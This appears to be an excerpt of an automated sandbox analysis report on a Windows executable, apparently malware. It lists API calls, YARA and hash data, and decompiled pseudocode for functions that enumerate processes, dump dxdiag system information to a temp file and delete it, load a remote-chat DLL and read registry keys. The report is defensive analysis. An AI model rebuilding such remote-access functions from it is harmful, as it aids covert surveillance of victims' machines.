                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                        • String ID:
                                        • API String ID: 819894693-0
                                        • Opcode ID: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                        • Opcode Fuzzy Hash: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wgetenv.MSVCRT ref: 0040E93E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1966616101-2001430897
                                        • Opcode ID: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                        • Opcode Fuzzy Hash: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F5E5DF0), ref: 00402302
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                        • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                        • CloseHandle.KERNEL32(00000000), ref: 00402392
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6F5E5DF0), ref: 004023A7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3745950881-0
                                        • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                        • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76,  &E0041B310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                        0x0040295e
                                        0x00402967
                                        0x00402971
                                        0x0040297a
                                        0x00402983
                                        0x0040299b
                                        0x004029ab
                                        0x004029ba
                                        0x004029c4
                                        0x004029c9
                                        0x004029cc
                                        0x004029cf
                                        0x00402a80
                                        0x00402a87
                                        0x00402a93
                                        0x00402a96
                                        0x00402a98
                                        0x00402b33
                                        0x00402b36
                                        0x00402b3e
                                        0x00402b47
                                        0x00402b4f
                                        0x00402b53
                                        0x00402b53
                                        0x00402aaf
                                        0x00402abf
                                        0x00402ac4
                                        0x00402ac9
                                        0x00402acc
                                        0x00402ad3
                                        0x00402adf
                                        0x00402ae9
                                        0x00402aee
                                        0x00402af7
                                        0x00402afe
                                        0x00402b05
                                        0x00402b08
                                        0x00402b0a
                                        0x00402b17
                                        0x00402b21
                                        0x00402b2b
                                        0x00402b2b
                                        0x00000000
                                        0x00402b08
                                        0x004029d5
                                        0x004029d6
                                        0x00000000
                                        0x00000000
                                        0x004029ec
                                        0x004029f5
                                        0x004029fc
                                        0x00402a08
                                        0x00402a10
                                        0x00000000
                                        0x00000000
                                        0x00402a22
                                        0x00402a32
                                        0x00402a3d
                                        0x00402a45
                                        0x00000000
                                        0x00402a4b
                                        0x00402a72
                                        0x00000000
                                        0x00000000
                                        0x00402a78
                                        0x00402a60
                                        0x00402a6a
                                        0x00000000

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                        • SetEvent.KERNEL32(?), ref: 0040297A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040299B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 004029AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                        • GetMessageA.USER32 ref: 00402A52
                                        • TranslateMessage.USER32(?), ref: 00402A60
                                        • DispatchMessageA.USER32 ref: 00402A6A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                        • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 1701728818-749203953
                                        • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                        • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040BE34, Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				char* _t74;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t74 =  &E0041B310;
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = _t74;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, _t74, E00412855(_t56,  &_v120, 0x41be40), _t74, _t35, 0x41be30, _t74, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
